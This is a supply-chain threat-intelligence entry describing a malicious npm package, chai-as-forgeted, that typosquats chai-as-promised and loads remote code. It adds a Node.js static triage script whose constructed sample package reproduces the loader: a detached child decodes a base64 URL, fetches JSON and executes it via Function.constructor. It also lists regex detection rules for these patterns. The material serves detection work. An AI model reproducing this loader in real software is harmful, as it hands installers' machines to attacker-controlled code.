Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in chai-as-forgeted (npm)

chai-as-forgeted

Risk score

92

AI summary

Indexed incident for chai-as-forgeted (npm).

Description

The package name typosquats the popular chai-as-promised assertion library, but its package.json description and keywords are copied from pino and the code has nothing to do with chai. The package's main entry exports a middleware factory that spawns lib/caller.js as a detached node child process. lib/caller.js base64-decodes a hardcoded URL pointing at api.jsonstorage.net (a mutable third-party JSON storage service), GETs the JSON document, extracts its cookie field, and executes the field's contents via new Function.constructor('require', s)(require), so the payload runs with full access to require. The C2 URL and request headers are stored as base64 strings inside a locally redefined process object that shadows the real process global, and are decoded with atob at runtime. Any consumer who installs the package and invokes the exported middleware triggers execution of arbitrary attacker-controlled code, and because the payload lives on a mutable storage endpoint the attacker can rotate it at will. A static scan of the package therefore shows only the loader, never the code that would actually run; the loader itself (base64-hidden URL, shadowed process object, detached child, Function.constructor execution) is the indicator to hunt for.
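The loader shape described above can be triaged statically. The following is an added example, not code from this page or from the chai-as-forgeted package: a small Node.js script that scans package sources for quoted base64 literals that decode to http(s) URLs, a local binding that shadows process, atob() decoding, Function.constructor or new Function execution, and a detached child_process spawn. The sample package it runs on is constructed to mimic that shape (the URL path under api.jsonstorage.net is hypothetical), and the rule set is the editor's own, not a ThreatPkg or OSV rule.

```javascript
// Added example: static triage for the loader pattern described on this page.
// The sample package below is CONSTRUCTED to mimic that shape; it is not the
// actual code of chai-as-forgeted, and the C2 URL path is hypothetical.

// A quoted literal that looks like canonical base64 (16+ chars, optional padding).
const B64_LITERAL = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;

// Return every quoted base64 literal in `src` that decodes to an http(s) URL.
function decodeBase64Urls(src) {
  const urls = [];
  for (const m of src.matchAll(B64_LITERAL)) {
    const s = m[1];
    if (s.length % 4 !== 0) continue;
    const buf = Buffer.from(s, 'base64');
    if (buf.toString('base64') !== s) continue; // reject non-canonical matches
    const text = buf.toString('utf8');
    if (/^https?:\/\/[A-Za-z0-9.-]+/.test(text)) urls.push(text);
  }
  return urls;
}

// Remaining indicators as plain regexes over the file text (editor's own rules).
const RULES = [
  ['shadowed-process', /\b(?:const|let|var)\s+process\s*=/],
  ['atob-decode', /\batob\s*\(/],
  ['dynamic-code', /Function(?:\.prototype)?\.constructor\s*\(|new\s+Function\s*\(/],
  ['detached-child', /\b(?:spawn|fork|exec|execFile)\s*\([^;]*detached\s*:\s*true/],
];

// Triage a package given as { relativePath: sourceText }; returns a list of findings.
function triage(files) {
  const findings = [];
  for (const [file, src] of Object.entries(files)) {
    for (const url of decodeBase64Urls(src)) {
      findings.push({ file, rule: 'base64-url', detail: url, host: new URL(url).hostname });
    }
    for (const [rule, re] of RULES) {
      const m = src.match(re);
      if (m) findings.push({ file, rule, detail: m[0] });
    }
  }
  return findings;
}

// --- Constructed sample package (hypothetical, not the real malware) ---
const SAMPLE_C2 = 'https://api.jsonstorage.net/v1/json/example-id'; // hypothetical path
const b64 = (s) => Buffer.from(s).toString('base64');
const SAMPLE_PACKAGE = {
  'index.js': `
const { spawn } = require('child_process');
module.exports = function middleware() {
  spawn(process.execPath, [require.resolve('./lib/caller.js')], { detached: true, stdio: 'ignore' }).unref();
  return (req, res, next) => next();
};
`,
  'lib/caller.js': `
const process = { u: '${b64(SAMPLE_C2)}', h: '${b64('{"accept":"application/json"}')}' };
fetch(atob(process.u), { headers: JSON.parse(atob(process.h)) })
  .then((r) => r.json())
  .then((j) => new Function.constructor('require', j.cookie)(require));
`,
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of triage(SAMPLE_PACKAGE)) console.log(f.file, f.rule, f.detail);
}
```

Point triage() at the unpacked tarball contents (one entry per .js file) and treat a base64-url hit on a third-party storage host together with dynamic-code and shadowed-process in the same package as a block-and-investigate signal; the decoded URL is also the right thing to feed into egress logs, since the fetched payload itself is not in the package.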

Technical details

Affected versions

= 9.24.6

Indicators

  • affected version = 9.24.6 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents